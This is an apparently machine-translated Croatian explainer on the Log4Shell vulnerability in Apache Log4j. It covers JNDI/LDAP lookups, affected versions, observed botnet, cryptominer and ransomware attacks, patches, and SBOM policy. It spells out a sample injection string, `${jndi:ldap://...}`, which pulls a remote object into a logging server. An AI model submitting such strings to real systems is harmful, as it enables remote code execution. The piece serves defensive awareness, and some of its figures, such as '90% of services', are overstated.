Pregled sadržaja[Sakriti][Pokazati]
Krajem studenog 2021. otkrili smo veliku prijetnju kibernetičkoj sigurnosti. Ovo poduzimanje potencijalno bi moglo utjecati na milijune računalnih sustava diljem svijeta.
Ovo je vodič o ranjivosti Log4j i kako je zanemarena greška u dizajnu ostavila preko 90% svjetskih računalnih usluga otvorenim za napad.
Apache Log4j je uslužni program za bilježenje otvorenog koda zasnovan na Javi koji je razvio Apache Software Foundation. Izvorno je napisao Ceki Gülcü 2001. godine, a sada je dio Apache Logging Services, projekta Apache Software Foundation.
Tvrtke diljem svijeta koriste biblioteku Log4j kako bi omogućile prijavu na svoje aplikacije. Zapravo, Java biblioteka toliko je sveprisutna da je možete pronaći u aplikacijama Amazona, Microsofta, Googlea i drugih.
Istaknutost knjižnice znači da bi svaki potencijalni nedostatak u kodu mogao milijune računala učiniti otvorenima za hakiranje. Dana 24. studenog 2021., a sigurnost u oblaku Istraživač koji radi za Alibabu otkrio je strašnu manu.
Ranjivost Log4j, također poznata kao Log4Shell, postoji nezapaženo od 2013. Ranjivost je omogućila zlonamjernim akterima pokretanje koda na zahvaćenim sustavima koji koriste Log4j. To je javno objavljeno 9. prosinca 2021
Industrijski stručnjaci nedostatak Log4Shell-a nazivaju najveća ranjivost u posljednje vrijeme.
U tjednu nakon objave ranjivosti, timovi za kibernetičku sigurnost otkrili su milijune napada. Neki su istraživači čak primijetili stopu od preko stotinu napada u minuti.
Kako radi?
Da bismo razumjeli zašto je Log4Shell toliko opasan, moramo razumjeti za što je sposoban.
Ranjivost Log4Shell omogućuje proizvoljno izvršavanje koda, što u osnovi znači da napadač može pokrenuti bilo koju naredbu ili kod na ciljnom stroju.
Kako to postiže?
Prvo, moramo razumjeti što je JNDI.
Java sučelje imenovanja i imenika (JNDI) je Java usluga koja omogućuje Java programima da otkriju i traže podatke i resurse putem imena. Ove usluge imenika važne su jer pružaju organizirani skup zapisa za programere na koje se lako može obratiti prilikom izrade aplikacija.
JNDI može koristiti različite protokole za pristup određenom direktoriju. Jedan od tih protokola je Lightweight Directory Access Protocol ili LDAP.
Prilikom zapisivanja niza, log4j obavlja zamjene nizova kada naiđu na izraze oblika ${prefix:name}
.
Na primjer, Text: ${java:version}
može biti prijavljen kao Tekst: Java verzija 1.8.0_65. Takve su zamjene uobičajene.
Možemo imati i izraze kao npr Text: ${jndi:ldap://example.com/file}
koji koristi JNDI sustav za učitavanje Java objekta s URL-a putem LDAP protokola.
To učinkovito učitava podatke koji dolaze s tog URL-a u stroj. Svaki potencijalni haker može ugostiti zlonamjerni kod na javnom URL-u i čekati da ga strojevi koji koriste Log4j zabilježe.
Budući da sadržaj poruka dnevnika sadrži podatke koje kontrolira korisnik, hakeri mogu umetnuti vlastite JNDI reference koje upućuju na LDAP poslužitelje koje kontroliraju. Ovi LDAP poslužitelji mogu biti puni zlonamjernih Java objekata koje JNDI može izvršiti kroz ranjivost.
Ono što ovo čini gorim je to što nije važno je li aplikacija aplikacija na strani poslužitelja ili na strani klijenta.
Dokle god postoji način da logger pročita napadačev zlonamjerni kod, aplikacija je i dalje otvorena za eksploatacije.
Tko je pogođen?
Ranjivost utječe na sve sustave i usluge koji koriste APache Log4j, s verzijama 2.0 do i uključujući 2.14.1.
Nekoliko sigurnosnih stručnjaka savjetuje da ranjivost može utjecati na brojne aplikacije koje koriste Javu.
Greška je prvi put otkrivena u video igrici Minecraft u vlasništvu Microsofta. Microsoft je pozvao svoje korisnike da nadograde svoje Java izdanje Minecraft softvera kako bi spriječili bilo kakav rizik.
Jen Easterly, direktorica Agencije za kibernetičku sigurnost i sigurnost infrastrukture (CISA) kaže da dobavljači imaju velika odgovornost kako bi se spriječilo krajnje korisnike od zlonamjernih aktera koji iskorištavaju ovu ranjivost.
"Dobavljači bi također trebali komunicirati sa svojim kupcima kako bi osigurali da krajnji korisnici znaju da njihov proizvod sadrži ovu ranjivost i trebali bi dati prioritet ažuriranjima softvera."
Napadi su navodno već počeli. Symantec, tvrtka koja nudi softver za kibernetičku sigurnost, uočila je raznolik broj zahtjeva za napadima.
Evo nekoliko primjera vrsta napada koje su istraživači otkrili:
- botneta
Botneti su mreža računala koja su pod kontrolom jedne napadačke strane. Pomažu u izvođenju DDoS napada, krađi podataka i drugim prijevarama. Istraživači su promatrali Muhstik botnet u shell skriptama preuzetim iz eksploatacije Log4j.
- XMRig Miner trojanac
XMRig je rudar kriptovaluta otvorenog koda koji koristi CPU za rudarenje tokena Monero. Cyber kriminalci mogu instalirati XMRig na uređaje ljudi kako bi mogli koristiti svoju procesorsku snagu bez njihova znanja.
- Khonsari Ransomware
Ransomware se odnosi na oblik zlonamjernog softvera koji je namijenjen šifriranje datoteka na računalu. Napadači tada mogu zahtijevati plaćanje u zamjenu za vraćanje pristupa šifriranim datotekama. Istraživači su otkrili Khonsari ransomware u napadima Log4Shell. Oni ciljaju na Windows poslužitelje i koriste .NET framework.
Što će se dogoditi sljedeće?
Stručnjaci predviđaju da će možda trebati mjeseci ili čak godine da se u potpunosti popravi kaos koji je izazvao ranjivost Log4J.
Ovaj proces uključuje ažuriranje svakog zahvaćenog sustava s zakrpljenom verzijom. Čak i ako su svi ovi sustavi zakrpljeni, još uvijek postoji prijetnja mogućih backdoor-a koje su hakeri možda već dodali prozoru da su poslužitelji otvoreni za napad.
Mnogi rješenja i ublažavanja postoji kako bi se spriječilo iskorištavanje aplikacija od strane ovog buga. Nova verzija Log4j 2.15.0-rc1 promijenila je različite postavke kako bi ublažila ovu ranjivost.
Sve značajke koje koriste JNDI bit će onemogućene prema zadanim postavkama, a također su ograničena i udaljena pretraživanja. Onemogućavanje značajke traženja na postavci Log4j pomoći će smanjiti rizik od mogućih iskorištavanja.
Izvan Log4j, još uvijek postoji potreba za širim planom za sprječavanje eksploatacije otvorenog koda.
Ranije u svibnju, Bijela kuća objavila je izvršni red koji je imao za cilj poboljšati nacionalnu kibernetičku sigurnost. To je uključivalo odredbu za softverski popis materijala (SBOM) koji je u biti bio formalni dokument koji je sadržavao popis svake stavke potrebne za izradu aplikacije.
To uključuje dijelove kao što su open source pakete, ovisnosti i API-je koji se koriste za razvoj. Iako su ideje SBOM-a korisne za transparentnost, hoće li doista pomoći potrošaču?
Nadogradnja ovisnosti može predstavljati preveliku gnjavažu. Tvrtke mogu jednostavno odlučiti platiti sve kazne umjesto da riskiraju gubljenje dodatnog vremena tražeći alternativne pakete. Možda će ti SBOM-ovi biti korisni samo ako budu djelokrug dalje je ograničeno.
Zaključak
Problem Log4j je više od samo tehničkog problema za organizacije.
Poslovni čelnici moraju biti svjesni potencijalnih rizika koji bi se mogli pojaviti kada se njihovi poslužitelji, proizvodi ili usluge oslanjaju na kod koji oni sami ne održavaju.
Oslanjanje na aplikacije otvorenog koda i aplikacije trećih strana uvijek nosi određeni rizik. Tvrtke bi trebale razmotriti izradu strategija za smanjenje rizika prije nego što nove prijetnje izađu na vidjelo.
Velik dio weba oslanja se na softver otvorenog koda koji održavaju tisuće volontera diljem svijeta.
Ako želimo zadržati web sigurnim mjestom, vlade i korporacije trebale bi ulagati u financiranje napora otvorenog koda i agencija za kibernetičku sigurnost kao što su CISA.
Ostavi odgovor